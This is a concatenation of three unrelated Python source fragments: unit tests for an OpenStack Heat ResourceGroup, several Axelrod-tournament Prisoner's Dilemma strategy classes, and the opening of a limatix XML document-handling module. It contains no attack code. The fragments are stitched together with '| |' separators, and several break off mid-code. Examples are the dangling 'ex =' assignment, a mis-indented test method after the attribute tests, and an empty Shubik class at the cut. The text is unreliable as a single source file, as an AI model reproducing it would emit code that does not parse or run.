def test_child_template(self):
    """child_template() assembles the nested template from member names."""
    stack = utils.parse_stack(template2)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)

    def fake_assemble(names):
        # count=2 should yield exactly the member names '0' and '1'.
        self.assertEqual(['0', '1'], list(names))
        return 'tmpl'

    group._assemble_nested = mock.Mock(side_effect=fake_assemble)
    group.properties.data[group.COUNT] = 2
    self.assertEqual('tmpl', group.child_template())
    self.assertEqual(1, group._assemble_nested.call_count)
def test_child_params(self):
    """The group passes no parameters down to its nested stack."""
    stack = utils.parse_stack(template2)
    group = resource_group.ResourceGroup(
        'test', stack.t.resource_definitions(stack)['group1'], stack)
    self.assertEqual({}, group.child_params())
def test_handle_create(self):
    """handle_create() creates the nested stack exactly once."""
    stack = utils.parse_stack(template2)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    group.create_with_template = mock.Mock(return_value=None)
    self.assertIsNone(group.handle_create())
    self.assertEqual(1, group.create_with_template.call_count)
def test_handle_create_with_batching(self):
    """Creating 10 members with max_batch_size=3 yields 4 batch tasks."""
    self.inspector.member_names.return_value = []
    self.inspector.size.return_value = 0
    stack = utils.parse_stack(tmpl_with_default_updt_policy())
    base_defn = stack.t.resource_definitions(stack)['group1']
    props = stack.t.t['resources']['group1']['properties'].copy()
    props['count'] = 10
    frozen = base_defn.freeze(
        properties=props,
        update_policy={'batch_create': {'max_batch_size': 3}})
    group = resource_group.ResourceGroup('test', frozen, stack)
    self.patchobject(scheduler.TaskRunner, 'start')
    self.assertEqual(4, len(group.handle_create()))
def test_handle_create_with_batching_zero_count(self):
    """With count=0, batching is bypassed and a single create happens."""
    self.inspector.member_names.return_value = []
    self.inspector.size.return_value = 0
    stack = utils.parse_stack(tmpl_with_default_updt_policy())
    base_defn = stack.t.resource_definitions(stack)['group1']
    props = stack.t.t['resources']['group1']['properties'].copy()
    props['count'] = 0
    frozen = base_defn.freeze(
        properties=props,
        update_policy={'batch_create': {'max_batch_size': 1}})
    group = resource_group.ResourceGroup('test', frozen, stack)
    group.create_with_template = mock.Mock(return_value=None)
    self.assertIsNone(group.handle_create())
    self.assertEqual(1, group.create_with_template.call_count)
def test_run_to_completion(self):
    """_run_to_completion issues one template update, then polls status."""
    stack = utils.parse_stack(template2)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    group._check_status_complete = mock.Mock(side_effect=[False, True])
    group.update_with_template = mock.Mock(return_value=None)
    next(group._run_to_completion(defn, 200))
    self.assertEqual(1, group.update_with_template.call_count)
def test_update_in_failed(self):
    """Updating a CREATE_FAILED group reassembles the nested stack."""
    stack = utils.parse_stack(template2)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    group.state_set('CREATE', 'FAILED')
    group._assemble_nested = mock.Mock(return_value='tmpl')
    group.properties.data[group.COUNT] = 2
    self.patchobject(scheduler.TaskRunner, 'start')
    group.handle_update(defn, mock.Mock(), {})
    self.assertTrue(group._assemble_nested.called)
def test_handle_delete(self):
    """handle_delete() simply delegates to delete_nested()."""
    stack = utils.parse_stack(template2)
    group = resource_group.ResourceGroup(
        'test', stack.t.resource_definitions(stack)['group1'], stack)
    group.delete_nested = mock.Mock(return_value=None)
    group.handle_delete()
    group.delete_nested.assert_called_once_with()
def test_handle_update_size(self):
    """Changing the member count triggers nested-template reassembly."""
    stack = utils.parse_stack(template2)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    group._assemble_nested = mock.Mock(return_value=None)
    group.properties.data[group.COUNT] = 5
    self.patchobject(scheduler.TaskRunner, 'start')
    group.handle_update(defn, mock.Mock(), {})
    self.assertTrue(group._assemble_nested.called)
class ResourceGroupBlackList(common.HeatTestCase):
    """This class tests ResourceGroup._name_blacklist()."""
    # Scenario legend (data_in = previously stored blacklist, rm_list =
    # removal_policies resource_list, rm_mode = removal_policies_mode):
    # 1) no resource_list, empty blacklist
    # 2) no resource_list, existing blacklist
    # 3) resource_list not in nested()
    # 4) resource_list (refid) not in nested()
    # 5) resource_list in nested() -> saved
    # 6) resource_list (refid) in nested() -> saved
    # 7) resource_list (refid) in nested(), update -> saved
    # 8) resource_list, update -> saved
    # 9) resource_list (refid) in nested(), grouputils fallback -> saved
    # A) resource_list (refid) in nested(), update, grouputils -> saved
    scenarios = [
        ('1', dict(data_in=None, rm_list=[],
                   nested_rsrcs=[], expected=[],
                   saved=False, fallback=False, rm_mode='append')),
        ('2', dict(data_in='0,1,2', rm_list=[],
                   nested_rsrcs=[], expected=['0', '1', '2'],
                   saved=False, fallback=False, rm_mode='append')),
        ('3', dict(data_in='1,3', rm_list=['6'],
                   nested_rsrcs=['0', '1', '3'],
                   expected=['1', '3'],
                   saved=False, fallback=False, rm_mode='append')),
        ('4', dict(data_in='0,1', rm_list=['id-7'],
                   nested_rsrcs=['0', '1', '3'],
                   expected=['0', '1'],
                   saved=False, fallback=False, rm_mode='append')),
        ('5', dict(data_in='0,1', rm_list=['3'],
                   nested_rsrcs=['0', '1', '3'],
                   expected=['0', '1', '3'],
                   saved=True, fallback=False, rm_mode='append')),
        ('6', dict(data_in='0,1', rm_list=['id-3'],
                   nested_rsrcs=['0', '1', '3'],
                   expected=['0', '1', '3'],
                   saved=True, fallback=False, rm_mode='append')),
        ('7', dict(data_in='0,1', rm_list=['id-3'],
                   nested_rsrcs=['0', '1', '3'],
                   expected=['3'],
                   saved=True, fallback=False, rm_mode='update')),
        ('8', dict(data_in='1', rm_list=[],
                   nested_rsrcs=['0', '1', '2'],
                   expected=[],
                   saved=True, fallback=False, rm_mode='update')),
        ('9', dict(data_in='0,1', rm_list=['id-3'],
                   nested_rsrcs=['0', '1', '3'],
                   expected=['0', '1', '3'],
                   saved=True, fallback=True, rm_mode='append')),
        ('A', dict(data_in='0,1', rm_list=['id-3'],
                   nested_rsrcs=['0', '1', '3'],
                   expected=['3'],
                   saved=True, fallback=True, rm_mode='update')),
    ]

    def test_blacklist(self):
        """Drive _update_name_blacklist() for one scenario and check both
        what gets persisted via data_set and what _name_blacklist() returns."""
        stack = utils.parse_stack(template)
        resg = stack['group1']
        if self.data_in is not None:
            resg.resource_id = 'foo'
        # mock properties
        properties = mock.MagicMock()
        p_data = {'removal_policies': [{'resource_list': self.rm_list}],
                  'removal_policies_mode': self.rm_mode}
        properties.get.side_effect = p_data.get
        # mock data get/set
        resg.data = mock.Mock()
        resg.data.return_value.get.return_value = self.data_in
        resg.data_set = mock.Mock()
        # mock nested access
        mock_inspect = mock.Mock()
        self.patchobject(grouputils.GroupInspector, 'from_parent_resource',
                         return_value=mock_inspect)
        mock_inspect.member_names.return_value = self.nested_rsrcs
        # With fallback=True the refs_map output is unavailable, forcing the
        # code to resolve refids through the nested stack instead.
        if not self.fallback:
            refs_map = {n: 'id-%s' % n for n in self.nested_rsrcs}
            resg.get_output = mock.Mock(return_value=refs_map)
        else:
            resg.get_output = mock.Mock(side_effect=exception.NotFound)

        def stack_contains(name):
            return name in self.nested_rsrcs

        def by_refid(name):
            # Map a refid like 'id-3' back to a mock resource named '3'.
            rid = name.replace('id-', '')
            if rid not in self.nested_rsrcs:
                return None
            res = mock.Mock()
            res.name = rid
            return res

        nested = mock.MagicMock()
        nested.__contains__.side_effect = stack_contains
        nested.__iter__.side_effect = iter(self.nested_rsrcs)
        nested.resource_by_refid.side_effect = by_refid
        resg.nested = mock.Mock(return_value=nested)
        resg._update_name_blacklist(properties)
        if self.saved:
            resg.data_set.assert_called_once_with('name_blacklist',
                                                  ','.join(self.expected))
        else:
            resg.data_set.assert_not_called()
        self.assertEqual(set(self.expected), resg._name_blacklist())
class ResourceGroupEmptyParams(common.HeatTestCase):
    """This class tests ResourceGroup.build_resource_definition()."""
    # Each scenario feeds one "empty-ish" value for property 'Foo':
    # `expected` is the definition built without include_all (None values
    # dropped), `expected_include` the one built with include_all=True.
    scenarios = [
        ('non_empty', dict(value='Bar', expected={'Foo': 'Bar'},
                           expected_include={'Foo': 'Bar'})),
        ('empty_None', dict(value=None, expected={},
                            expected_include={'Foo': None})),
        ('empty_boolean', dict(value=False, expected={'Foo': False},
                               expected_include={'Foo': False})),
        ('empty_string', dict(value='', expected={'Foo': ''},
                              expected_include={'Foo': ''})),
        ('empty_number', dict(value=0, expected={'Foo': 0},
                              expected_include={'Foo': 0})),
        ('empty_json', dict(value={}, expected={'Foo': {}},
                            expected_include={'Foo': {}})),
        ('empty_list', dict(value=[], expected={'Foo': []},
                            expected_include={'Foo': []}))
    ]

    def test_definition(self):
        """Build member '0' definitions and compare default vs include_all."""
        templ = copy.deepcopy(template)
        res_def = templ["resources"]["group1"]["properties"]['resource_def']
        res_def['properties']['Foo'] = self.value
        stack = utils.parse_stack(templ)
        snip = stack.t.resource_definitions(stack)['group1']
        resg = resource_group.ResourceGroup('test', snip, stack)
        exp1 = rsrc_defn.ResourceDefinition(
            None,
            "OverwrittenFnGetRefIdType",
            self.expected)
        exp2 = rsrc_defn.ResourceDefinition(
            None,
            "OverwrittenFnGetRefIdType",
            self.expected_include)
        rdef = resg.get_resource_def()
        self.assertEqual(exp1, resg.build_resource_definition('0', rdef))
        rdef = resg.get_resource_def(include_all=True)
        self.assertEqual(
            exp2, resg.build_resource_definition('0', rdef))
class ResourceGroupNameListTest(common.HeatTestCase):
    """This class tests ResourceGroup._resource_names()."""
    # 1) no blacklist, 0 count
    # 2) no blacklist, x count
    # 3) blacklist (not effecting)
    # 4) blacklist with pruning
    scenarios = [
        ('1', dict(blacklist=[], count=0,
                   expected=[])),
        ('2', dict(blacklist=[], count=4,
                   expected=['0', '1', '2', '3'])),
        ('3', dict(blacklist=['5', '6'], count=3,
                   expected=['0', '1', '2'])),
        ('4', dict(blacklist=['2', '4'], count=4,
                   expected=['0', '1', '3', '5'])),
    ]

    def test_names(self):
        """Member names skip blacklisted ids until `count` names remain."""
        stack = utils.parse_stack(template)
        group = stack['group1']
        group.properties = mock.MagicMock()
        group.properties.get.return_value = self.count
        group._name_blacklist = mock.MagicMock(return_value=self.blacklist)
        self.assertEqual(self.expected, list(group._resource_names()))
class ResourceGroupAttrTest(common.HeatTestCase):
    """Tests FnGetAtt aggregation over a ResourceGroup's members."""

    def test_aggregate_attribs(self):
        """Test attribute aggregation.
        Test attribute aggregation and that we mimic the nested resource's
        attributes.
        """
        resg = self._create_dummy_stack()
        expected = ['0', '1']
        # Attribute names are matched case-sensitively per member but both
        # spellings exist on the dummy resource.
        self.assertEqual(expected, resg.FnGetAtt('foo'))
        self.assertEqual(expected, resg.FnGetAtt('Foo'))

    def test_index_dotted_attribs(self):
        """Test attribute aggregation.
        Test attribute aggregation and that we mimic the nested resource's
        attributes.
        """
        resg = self._create_dummy_stack()
        # 'resource.N.attr' addresses a single member via dotted syntax.
        self.assertEqual('0', resg.FnGetAtt('resource.0.Foo'))
        self.assertEqual('1', resg.FnGetAtt('resource.1.Foo'))

    def test_index_path_attribs(self):
        """Test attribute aggregation.
        Test attribute aggregation and that we mimic the nested resource's
        attributes.
        """
        resg = self._create_dummy_stack()
        # Same as above but with the attribute path as extra arguments.
        self.assertEqual('0', resg.FnGetAtt('resource.0', 'Foo'))
        self.assertEqual('1', resg.FnGetAtt('resource.1', 'Foo'))

    def test_index_deep_path_attribs(self):
        """Test attribute aggregation.
        Test attribute aggregation and that we mimic the nested resource's
        attributes.
        """
        resg = self._create_dummy_stack(template_attr,
                                        expect_attrs={'0': 2, '1': 2})
        self.assertEqual(2, resg.FnGetAtt('resource.0',
                                          'nested_dict', 'dict', 'b'))
        self.assertEqual(2, resg.FnGetAtt('resource.1',
                                          'nested_dict', 'dict', 'b'))

    def test_aggregate_deep_path_attribs(self):
        """Test attribute aggregation.
        Test attribute aggregation and that we mimic the nested resource's
        attributes.
        """
        resg = self._create_dummy_stack(template_attr,
                                        expect_attrs={'0': 3, '1': 3})
        expected = [3, 3]
        self.assertEqual(expected, resg.FnGetAtt('nested_dict', 'list', 2))

    def test_aggregate_refs(self):
        """Test resource id aggregation."""
        resg = self._create_dummy_stack()
        expected = ['ID-0', 'ID-1']
        self.assertEqual(expected, resg.FnGetAtt("refs"))

    def test_aggregate_refs_with_index(self):
        """Test resource id aggregation with index."""
        resg = self._create_dummy_stack()
        expected = ['ID-0', 'ID-1']
        self.assertEqual(expected[0], resg.FnGetAtt("refs", 0))
        self.assertEqual(expected[1], resg.FnGetAtt("refs", 1))
        # Out-of-range index yields None rather than raising.
        self.assertIsNone(resg.FnGetAtt("refs", 2))

    def test_aggregate_refs_map(self):
        # 'refs_map' maps member name -> physical resource id.
        resg = self._create_dummy_stack()
        found = resg.FnGetAtt("refs_map")
        expected = {'0': 'ID-0', '1': 'ID-1'}
        self.assertEqual(expected, found)

    def test_aggregate_outputs(self):
        """Test outputs aggregation."""
        expected = {'0': ['foo', 'bar'], '1': ['foo', 'bar']}
        resg = self._create_dummy_stack(template_attr, expect_attrs=expected)
        self.assertEqual(expected, resg.FnGetAtt('attributes', 'list'))

    def test_aggregate_outputs_no_path(self):
        """Test outputs aggregation with missing path."""
        resg = self._create_dummy_stack(template_attr)
        # 'attributes' without a sub-path is invalid.
        self.assertRaises(exception.InvalidTemplateAttribute,
                          resg.FnGetAtt, 'attributes')
def test_index_refs(self):
"""Tests getting ids of individual resources."""
resg = self._create_dummy_stack()
self.assertEqual("ID-0", resg.FnGetAtt('resource.0'))
self.assertEqual("ID-1", resg.FnGetAtt('resource.1'))
ex = | |
"""
Additional strategies from Axelrod's first tournament.
"""
import random
from typing import Dict, List, Tuple
from axelrod.action import Action
from axelrod.player import Player
from axelrod.random_ import random_choice
from axelrod.strategy_transformers import FinalTransformer
from scipy.stats import chisquare
from .memoryone import MemoryOnePlayer
C, D = Action.C, Action.D
class Davis(Player):
    """
    Submitted to Axelrod's first tournament by Morton Davis.
    A player starts by cooperating for 10 rounds then plays Grudger,
    defecting if at any point the opponent has defected.
    This strategy came 8th in Axelrod's original tournament.
    Names:
    - Davis: [Axelrod1980]_
    """

    name = "Davis"
    classifier = {
        "memory_depth": float("inf"),  # Long memory
        "stochastic": False,
        "makes_use_of": set(),
        "long_run_time": False,
        "inspects_source": False,
        "manipulates_source": False,
        "manipulates_state": False,
    }

    def __init__(self, rounds_to_cooperate: int = 10) -> None:
        """
        Parameters
        ----------
        rounds_to_cooperate: int, 10
            The number of rounds to cooperate initially
        """
        super().__init__()
        self._rounds_to_cooperate = rounds_to_cooperate

    def strategy(self, opponent: Player) -> Action:
        """Cooperate unconditionally during the opening rounds; afterwards
        defect forever once the opponent has defected even once."""
        in_opening_phase = len(self.history) < self._rounds_to_cooperate
        if in_opening_phase or not opponent.defections:
            return C
        return D
class RevisedDowning(Player):
    """This strategy attempts to estimate the next move of the opponent by estimating
    the probability of cooperating given that they defected (:math:`p(C|D)`) or
    cooperated on the previous round (:math:`p(C|C)`). These probabilities are
    continuously updated during play and the strategy attempts to maximise the long
    term play. Note that the initial values are :math:`p(C|C)=p(C|D)=.5`.
    Downing is implemented as `RevisedDowning`. Apparently in the first tournament
    the strategy was implemented incorrectly and defected on the first two rounds.
    This can be controlled by setting `revised=True` to prevent the initial defections.
    This strategy came 10th in Axelrod's original tournament but would have won
    if it had been implemented correctly.
    Names:
    - Revised Downing: [Axelrod1980]_
    """

    # Bug fix: the display name had been replaced by a "<NAME>" placeholder;
    # restored to the name documented in the docstring above.
    name = "Revised Downing"
    classifier = {
        "memory_depth": float("inf"),
        "stochastic": False,
        "makes_use_of": set(),
        "long_run_time": False,
        "inspects_source": False,
        "manipulates_source": False,
        "manipulates_state": False,
    }

    def __init__(self, revised: bool = True) -> None:
        """
        Parameters
        ----------
        revised: bool, True
            If True, cooperate on the first round instead of replicating the
            (incorrect) original behaviour of defecting on the first two.
        """
        super().__init__()
        self.revised = revised
        self.good = 1.0   # running estimate related to p(C|C)
        self.bad = 0.0    # running estimate related to p(C|D)
        self.nice1 = 0    # opponent cooperations following our C
        self.nice2 = 0    # opponent cooperations following our D
        self.total_C = 0  # note the same as self.cooperations
        self.total_D = 0  # note the same as self.defections

    def strategy(self, opponent: Player) -> Action:
        round_number = len(self.history) + 1
        # According to internet sources, the original implementation defected
        # on the first two moves. Otherwise it wins (if this code is removed
        # and the comment restored.
        # http://www.sci.brooklyn.cuny.edu/~sklar/teaching/f05/alife/notes/azhar-ipd-Oct19th.pdf
        if self.revised:
            if round_number == 1:
                return C
        elif not self.revised:
            if round_number <= 2:
                return D
        # Update various counts
        if round_number > 2:
            if self.history[-1] == D:
                if opponent.history[-1] == C:
                    self.nice2 += 1
                self.total_D += 1
                self.bad = self.nice2 / self.total_D
            else:
                if opponent.history[-1] == C:
                    self.nice1 += 1
                self.total_C += 1
                self.good = self.nice1 / self.total_C
        # Make a decision based on the accrued counts
        c = 6.0 * self.good - 8.0 * self.bad - 2
        alt = 4.0 * self.good - 5.0 * self.bad - 1
        if c >= 0 and c >= alt:
            move = C
        elif (c >= 0 and c < alt) or (alt >= 0):
            # Alternate: repeat the flip of our own previous move.
            move = self.history[-1].flip()
        else:
            move = D
        return move
class Feld(Player):
    """
    Submitted to Axelrod's first tournament by Scott Feld.
    This strategy plays Tit For Tat, always defecting if the opponent defects but
    cooperating when the opponent cooperates with a gradually decreasing probability
    until it is only .5.
    This strategy came 11th in Axelrod's original tournament.
    Names:
    - Feld: [Axelrod1980]_
    """

    name = "Feld"
    classifier = {
        "memory_depth": 200,  # Varies actually, eventually becomes depth 1
        "stochastic": True,
        "makes_use_of": set(),
        "long_run_time": False,
        "inspects_source": False,
        "manipulates_source": False,
        "manipulates_state": False,
    }

    def __init__(
        self,
        start_coop_prob: float = 1.0,
        end_coop_prob: float = 0.5,
        rounds_of_decay: int = 200,
    ) -> None:
        """
        Parameters
        ----------
        start_coop_prob, float
            The initial probability to cooperate
        end_coop_prob, float
            The final probability to cooperate
        rounds_of_decay, int
            The number of rounds to linearly decrease from start_coop_prob
            to end_coop_prob
        """
        super().__init__()
        self._start_coop_prob = start_coop_prob
        self._end_coop_prob = end_coop_prob
        self._rounds_of_decay = rounds_of_decay

    def _cooperation_probability(self) -> float:
        """It's not clear what the interpolating function is, so we'll do
        something simple that decreases monotonically from 1.0 to 0.5 over
        200 rounds."""
        per_round_drop = (
            self._end_coop_prob - self._start_coop_prob
        ) / self._rounds_of_decay
        current = self._start_coop_prob + per_round_drop * len(self.history)
        # Never decay below the configured floor.
        return max(current, self._end_coop_prob)

    def strategy(self, opponent: Player) -> Action:
        """Defect in response to a defection; otherwise cooperate with a
        probability that decays over the course of the game."""
        if not opponent.history:
            return C
        if opponent.history[-1] == D:
            return D
        return random_choice(self._cooperation_probability())
class Grofman(Player):
    """
    Submitted to Axelrod's first tournament by Bernard Grofman.
    Cooperate on the first two rounds and
    returns the opponent's last action for the next 5. For the rest of the game
    Grofman cooperates if both players selected the same action in the previous
    round, and otherwise cooperates randomly with probability 2/7.
    This strategy came 4th in Axelrod's original tournament.
    Names:
    - Grofman: [Axelrod1980]_
    """

    name = "Grofman"
    classifier = {
        "memory_depth": float("inf"),
        "stochastic": True,
        "makes_use_of": set(),
        "long_run_time": False,
        "inspects_source": False,
        "manipulates_source": False,
        "manipulates_state": False,
    }

    def strategy(self, opponent: Player) -> Action:
        """Cooperate twice, mirror for five rounds, then cooperate on
        agreement and otherwise cooperate with probability 2/7."""
        turn = len(self.history) + 1
        if turn < 3:
            return C
        if turn < 8:
            return opponent.history[-1]
        agreed_last_round = self.history[-1] == opponent.history[-1]
        return C if agreed_last_round else random_choice(2 / 7)
class Joss(MemoryOnePlayer):
    """
    Submitted to Axelrod's first tournament by Johann Joss.
    Cooperates with probability 0.9 when the opponent cooperates, otherwise
    emulates Tit-For-Tat.
    This strategy came 12th in Axelrod's original tournament.
    Names:
    - Joss: [Axelrod1980]_
    - <NAME>: [Stewart2012]_
    """

    name = "Joss"

    def __init__(self, p: float = 0.9) -> None:
        """
        Parameters
        ----------
        p, float
            The probability of cooperating when the previous round was (C, C)
            or (D, C), i.e. the opponent cooperated.
        """
        self.p = p
        # Memory-one vector ordered (CC, CD, DC, DD): cooperate with
        # probability p after opponent's C, always defect after their D.
        super().__init__((p, 0, p, 0))
class Nydegger(Player):
    r"""
    Submitted to Axelrod's first tournament by Rudy Nydegger.
    The program begins with tit for tat for the first three moves, except
    that if it was the only one to cooperate on the first move and the only one
    to defect on the second move, it defects on the third move. After the
    third move, its choice is determined from the 3 preceding outcomes in the
    following manner.
    .. math::
    A = 16 a_1 + 4 a_2 + a_3
    Where :math:`a_i` is dependent on the outcome of the previous :math:`i` th
    round. If both strategies defect, :math:`a_i=3`, if the opponent only defects:
    :math:`a_i=2` and finally if it is only this strategy that defects then
    :math:`a_i=1`.
    Finally this strategy defects if and only if:
    .. math::
    A \in \{1, 6, 7, 17, 22, 23, 26, 29, 30, 31, 33, 38, 39, 45, 49, 54, 55, 58, 61\}
    Thus if all three preceding moves are mutual defection, A = 63 and the rule
    cooperates. This rule was designed for use in laboratory experiments as a
    stooge which had a memory and appeared to be trustworthy, potentially
    cooperative, but not gullible.
    This strategy came 3rd in Axelrod's original tournament.
    Names:
    - Nydegger: [Axelrod1980]_
    """
    # NOTE: the docstring is now a raw string so the LaTeX escapes
    # (\in, \{) are not treated as (invalid) string escape sequences.

    name = "Nydegger"
    classifier = {
        "memory_depth": 3,
        "stochastic": False,
        "makes_use_of": set(),
        "long_run_time": False,
        "inspects_source": False,
        "manipulates_source": False,
        "manipulates_state": False,
    }

    def __init__(self) -> None:
        # Bug fix: 49 was listed in the docstring's defection set (and in
        # [Axelrod1980]_) but was missing from this list.
        self.As = [1, 6, 7, 17, 22, 23, 26, 29, 30, 31, 33, 38, 39, 45, 49,
                   54, 55, 58, 61]
        # Outcome weights: (C, C)=0, (D, C)=1, (C, D)=2, (D, D)=3.
        self.score_map = {(C, C): 0, (C, D): 2, (D, C): 1, (D, D): 3}
        super().__init__()

    @staticmethod
    def score_history(
        my_history: List[Action],
        opponent_history: List[Action],
        score_map: Dict[Tuple[Action, Action], int],
    ) -> int:
        """Implements the Nydegger formula A = 16 a_1 + 4 a_2 + a_3"""
        a = 0
        for i, weight in [(-1, 16), (-2, 4), (-3, 1)]:
            plays = (my_history[i], opponent_history[i])
            a += weight * score_map[plays]
        return a

    def strategy(self, opponent: Player) -> Action:
        if len(self.history) == 0:
            return C
        if len(self.history) == 1:
            # TFT
            return D if opponent.history[-1] == D else C
        if len(self.history) == 2:
            # Special case: defect on move 3 iff the opponent opened D, C.
            if opponent.history[0:2] == [D, C]:
                return D
            else:
                # TFT
                return D if opponent.history[-1] == D else C
        A = self.score_history(self.history[-3:], opponent.history[-3:], self.score_map)
        if A in self.As:
            return D
        return C
class Shubik(Player):
"""
| |
<filename>limatix/xmldoc.py
from lxml import etree
import os
import os.path
import copy
import sys
import traceback
import numbers
import signal
import socket
import time
import shutil
import collections
import xml.sax.saxutils
try:
# py2.x
from urllib import pathname2url
from urllib import url2pathname
import urlparse
pass
except ImportError:
import urllib.parse as urlparse # python3
from urllib.request import pathname2url
from urllib.request import url2pathname
pass
import urllib
if os.name=='nt':
# win32 fcntl.flock alternative:
# loosely based on http://code.activestate.com/recipes/65203/
import win32con
import win32file
import pywintypes
pwt__overlapped = pywintypes.OVERLAPPED()
pass
else:
import fcntl
pass
try:
from . import provenance as provenance
pass
except ImportError:
sys.stderr.write("xmldoc: Warning provenance support not available\n")
# Create dummy class "provenance" that makes provenance calls into no-ops
class provenance(object):
@classmethod
def xmldocelementaccessed(cls,xmldocu,element):
pass
@classmethod
def warnnoprovenance(cls,msg):
pass
@classmethod
def elementgenerated(cls,doc,element):
pass
pass
pass
import numpy as np
from . import lm_units as lmu
from . import dc_value
try:
from .canonicalize_path import canonicalize_path
from .canonicalize_path import relative_path_to
pass
except ImportError:
from os.path import realpath as canonicalize_path
relative_path_to=lambda start,path: os.path.relpath(path,start)
pass
try:
from .canonicalize_path import canonicalize_etxpath
from .canonicalize_path import getelementetxpath
from .canonicalize_path import create_canonical_etxpath
from .canonicalize_path import canonical_etxpath_split
from .canonicalize_path import canonical_etxpath_join
from .canonicalize_path import canonical_etxpath_absjoin
from .canonicalize_path import etxpath_isabs
from .canonicalize_path import etxpath2human
pass
except ImportError:
canonicalize_etxpath=None
pass
try:
from cStringIO import StringIO
pass
except ImportError:
from io import StringIO
pass
try:
import builtins # python3
pass
except ImportError:
import __builtin__ as builtins # python2
pass
if not hasattr(builtins,"basestring"):
basestring=str # python3
unicode=str # python3
pass
gtk=None
gobject=None
class fileinfo(object):
    """Snapshot of an open file's stat identity (mtime, inode, size).

    Two snapshots compare equal iff all three fields match; used to
    detect whether an on-disk copy has changed behind our back.
    """
    mtime=None   # modification time (os.fstat st_mtime)
    inode=None   # inode number (st_ino)
    size=None    # file size in bytes (st_size)
    def __init__(self,fd):
        """Capture mtime/inode/size from the open file descriptor fd."""
        statbuf=os.fstat(fd)
        self.mtime=statbuf.st_mtime
        self.inode=statbuf.st_ino
        self.size=statbuf.st_size
        pass
    def __str__(self):
        return "xmldoc.fileinfo(mtime=%d,inode=%d,size=%d)" % (self.mtime,self.inode,self.size)
    def __eq__(self,other):
        # Returning NotImplemented for foreign types (instead of raising
        # AttributeError, as the old code did) makes comparisons such as
        # fi == None safe: Python then falls back to identity comparison.
        if not isinstance(other,fileinfo):
            return NotImplemented
        return self.mtime==other.mtime and self.inode==other.inode and self.size==other.size
    def __ne__(self,other):
        result=self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result
def loadgtk():
    """Import the GTK bindings on first use, caching them in the global ``gtk``.

    Chooses GTK3 (via GObject introspection) when the application has
    already imported ``gi``; otherwise falls back to the legacy gtk2
    module.  A no-op once ``gtk`` is populated.
    """
    global gtk
    if gtk is not None:
        return
    if "gi" in sys.modules:
        # gtk3 via GObject introspection
        import gi
        gi.require_version('Gtk','3.0')
        from gi.repository import Gtk as gtk
    else:
        # legacy gtk2 bindings
        import gtk
def loadgobject():
    """Import the GObject bindings on first use, caching them in the global ``gobject``.

    Mirrors loadgtk(): prefers ``gi.repository.GObject`` when ``gi`` is
    already imported, else falls back to the legacy gtk2 module.
    """
    global gobject
    if gobject is not None:
        return
    if "gi" in sys.modules:
        # gtk3: GObject comes from gi.repository
        from gi.repository import GObject as gobject
    else:
        # legacy gtk2 bindings
        import gobject
startuptime=None  # per-process timestamp used in in-memory ids; set on first use
def generate_inmemory_id(checklist):
    """Return a unique mem:// identifier URL for an in-memory checklist object.

    Combines hostname, a once-per-process timestamp, the pid, and the
    object's id() so that ids are distinct across hosts, processes, and
    objects within a process.
    """
    global startuptime
    if startuptime is None:
        # record once; later calls reuse the same (hopefully unique) value
        startuptime = time.time()
    host = socket.gethostname()
    return "mem://%s/%d/%d/%d" % (host, startuptime, os.getpid(), id(checklist))
def _xlinkcontextfixuptree(ETree,oldcontexthref,newcontexthref,force_abs_href=False):
    """Rewrite xlink:href attributes in-place for a new context location.

    Walks the provided etree.ElementTree or etree.Element, reinterprets
    each xlink:href URL relative to oldcontexthref, and rewrites it
    relative to newcontexthref.  When force_abs_href is set (appropriate
    if the new location is a fundamental move) or the new context is
    None/blank, links are made absolute instead.  Returns the number of
    attributes modified.
    """
    hrefattr = "{http://www.w3.org/1999/xlink}href"
    finder = etree.ETXPath("descendant-or-self::*[@{http://www.w3.org/1999/xlink}href]")
    # Decide once whether we emit absolute or context-relative URLs.
    want_absolute = force_abs_href or (newcontexthref is None) or newcontexthref.isblank()
    nummodified = 0
    for el in finder(ETree):
        oldurl = el.attrib[hrefattr]
        href = dc_value.hrefvalue(oldurl, contexthref=oldcontexthref)
        if want_absolute:
            fixedurl = href.absurl()
        else:
            fixedurl = href.attempt_relative_url(newcontexthref)
        if fixedurl != oldurl:
            el.attrib[hrefattr] = fixedurl
            nummodified += 1
    return nummodified
try:
from databrowse.lib import db_lib as dbl
pass
except ImportError:
dbl=None
pass
__pychecker__="no-argsused"
# !!! Very important: Only modify the xmldoc using its member functions (otherwise the modification tracking
# will not work)
# !!! Very important: Do not keep deep references inside the xmldoc. These may change due to a resync().
# Save element locations with savepath(). You can later reextract elements
# after the resync() with restorepath(). This will work properly so
# long as no elements have been added to the tree upward of where you
# are looking.
# Namespace management
# --------------------
# When you create an xmldoc, you specify a namespace mapping that
# gets encoded into the root node. (If no mapping is provided, a default
# is used). When working with the xmldoc in memory and syncing to disk,
# the in-memory mapping and the root node mapping are kept distinct.
# When you add an in-memory mapping with merge_namespace or resync an
# on-disk copy that may be missing one of these namespaces, xmldoc
# will add any additional prefix mappings that might be in the
# in-memory mapping to the root node mapping, so long
# as they do not conflict (either in prefix or namespace) with an existing
# mapping.
# When you try to access elements, only the in-memory mapping is used.
# The root node mapping is entirely irrelevant except that it is what is used
# when manually editing the file as written to disk
# xmldoc limitations
# -----------------
# * Not thread safe: See use of signal() to hold off SIGINT during
# _flush() update and use of lxml which itself is not thread safe
# * Does not properly handle XML comments within simple tags (within
# compound tags OK). The problem is we use lxml's ".text" object
# attribute, which only gives us the first text node.
#
# Future plans
# ------------
# 1. Fix deep references in checklist steps. DONE
# 2. Add support for multiple layers of backup files. DONE
# 3. Eliminate xmlgrab2 PENDING
# 4. Implement file locking and explicit modification and critical regions. DONE
# 5. Fix up provenance handling in recursive operations. Specifically copyelements()
class xmldoc(object):
"""
xmldoc is a class that represents readable (and optionally writable)
xml documents. This class supports synchronization to disk (flushing
of changes, reading in external changes) when requested.
Because of the potential for rereading, and therefore
invalidation of all of the element objects, you should
never store references to elements. Instead you
should use use xmldoc.getpath() to get the element
location which can be stored instead. Get a new
reference when needed with xmldoc.xpathsingle()
